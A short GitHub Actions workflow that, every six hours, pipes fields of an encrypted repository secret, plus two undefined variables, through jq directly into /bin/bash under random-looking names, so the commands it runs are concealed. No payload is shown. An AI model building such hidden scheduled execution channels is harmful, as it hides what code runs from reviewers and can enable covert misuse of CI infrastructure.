name: anquanys

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: anquanys
        env:
          njiai42: ${{ secrets.njiai42 }}
        run: |
          echo $njiai42 | jq -r .nak988 | /bin/bash
          echo $h7 | jq -r .ygl03259 | /bin/bash
          echo $qfxmm67 | jq -r .o18 | /bin/bash

